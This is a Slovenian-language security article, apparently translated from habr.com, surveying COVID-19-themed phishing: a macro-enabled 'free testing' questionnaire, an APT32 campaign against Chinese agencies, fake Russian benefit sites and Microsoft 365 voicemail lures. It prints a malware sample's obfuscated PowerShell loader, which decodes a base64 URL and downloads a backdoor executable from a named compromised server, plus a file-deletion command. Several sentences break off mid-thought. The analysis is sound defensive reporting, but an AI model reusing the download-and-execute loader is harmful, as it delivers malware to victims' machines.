Napadalci še naprej izkoriščajo temo COVID-19 in ustvarjajo vse več groženj za uporabnike, ki jih močno zanima vse, kar je povezano z epidemijo. IN
Zapomni si v
Želite brezplačno testiranje na COVID-19?
Drug pomemben primer lažnega predstavljanja na temo koronavirusa je bil
Tudi prepričati večino uporabnikov, da omogočijo makre, je bilo enostavno. Za to je bil uporabljen standardni trik: za izpolnitev vprašalnika morate najprej omogočiti makre, kar pomeni, da morate zagnati skript VBA.
Kot lahko vidite, je skript VBA posebej prikrit pred protivirusnimi programi.
Windows ima funkcijo čakanja, pri kateri aplikacija čaka /T <sekund>, preden sprejme privzeti odgovor »Da«. V našem primeru je skript čakal 65 sekund, preden je izbrisal začasne datoteke:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
In med čakanjem se je naložila zlonamerna programska oprema. Za to je bil zagnan poseben skript PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Po dekodiranju vrednosti Base64 skript PowerShell prenese stranska vrata, ki se nahajajo na predhodno vdrtem spletnem strežniku iz Nemčije:
http://automatischer-staubsauger.com/feature/777777.png
in ga shrani pod imenom:
C:UsersPublictmpdirfile1.exe
Mapa ‘C:UsersPublictmpdir’
se izbriše pri zagonu datoteke 'tmps1.bat', ki vsebuje ukaz cmd /c mkdir ""C:UsersPublictmpdir"".
Ciljni napad na vladne agencije
Poleg tega so analitiki FireEye pred kratkim poročali o ciljanem napadu APT32, namenjenem vladnim strukturam v Wuhanu in kitajskemu ministrstvu za upravljanje v izrednih razmerah. Eden od distribuiranih RTF-jev je vseboval povezavo do članka New York Timesa z naslovom
Zanimivo je, da v času zaznave nobeden od protivirusnih programov ni zaznal tega primera, poroča Virustotal.
Ko uradne spletne strani ne delujejo
Najbolj osupljiv primer lažnega predstavljanja se je zgodil v Rusiji pred dnevi. Razlog za to je bilo imenovanje dolgo pričakovanega nadomestila za otroke, stare od 3 do 16 let. Ko je bil 12. maja 2020 objavljen začetek sprejema prijav, so milijoni pohiteli na spletno stran državnih služb po dolgo pričakovano pomoč in portal zrušili nič hujšega kot profesionalni napad DDoS. Ko je predsednik rekel, da "vladne službe niso kos pretoku prijav," so ljudje na spletu začeli govoriti o uvedbi alternativnega mesta za sprejemanje prijav.
Težava je v tem, da je naenkrat začelo delovati več spletnih mest, in medtem ko eno, pravo na posobie16.gosuslugi.ru, dejansko sprejema prijave, več
Kolegi iz SearchInform so v coni .ru našli okoli 30 novih goljufivih domen. Infosecurity in Softline Company sta od začetka aprila sledila več kot 70 podobnim lažnim spletnim stranem državnih služb. Njihovi ustvarjalci manipulirajo z znanimi simboli in uporabljajo tudi kombinacije besed gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie ipd.
Hype in socialni inženiring
Vsi ti primeri samo potrjujejo, da napadalci uspešno monetizirajo temo koronavirusa. In večja ko je družbena napetost in bolj nejasna vprašanja, več možnosti imajo prevaranti, da ukradejo pomembne podatke, prisilijo ljudi, da se sami odrečejo svojemu denarju, ali preprosto vdrejo v več računalnikov.
In glede na to, da je pandemija potencialno nepripravljene množično prisilila v delo od doma, niso ogroženi le osebni, temveč tudi korporativni podatki. Nedavno so bili na primer uporabniki Microsoft 365 (prej Office 365) prav tako izpostavljeni lažnemu predstavljanju. Ljudje so prejeli ogromno "zgrešenih" glasovnih sporočil kot priloge pisem. Vendar so bile datoteke dejansko stran HTML, na katero so bile poslane žrtve napada
Vir: www.habr.com